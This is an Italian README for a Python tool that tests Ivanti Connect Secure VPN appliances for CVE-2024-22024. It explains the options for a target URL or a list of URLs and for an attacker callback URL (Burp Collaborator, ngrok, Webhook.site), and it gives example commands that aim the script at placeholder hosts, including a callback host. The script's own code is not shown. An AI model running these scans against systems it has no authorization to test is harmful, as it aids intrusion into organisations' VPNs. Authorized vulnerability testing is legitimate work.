
Verifica la vulnerabilità CVE-2024-22024 in Ivanti Connect Secure
Controlla la vulnerabilità CVE-2024-22024 in Ivanti Connect Secure
[!WARNING] SOLO A SCOPO EDUCATIVO E DI TEST AUTORIZZATO.
-u o --target_url: L'URL target di Ivanti Connect Secure (ICS) o file con elenco di URL.
-c o --attacker_url: L'URL dell'attaccante (generane uno usando Burp Collaborator, ngrok, o utilizzando un URL unico da Webhook.site)
-t o --timeout: Timeout in secondi per la richiesta (predefinito 3 secondi)
Test di un singolo URL:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
Test di un elenco di URL:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
Utilizzo di un timeout diverso (5 secondi):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
Chiunque abbia scoperto la vulnerabilità.. Io ho solo letto il PoC e automatizzato questo.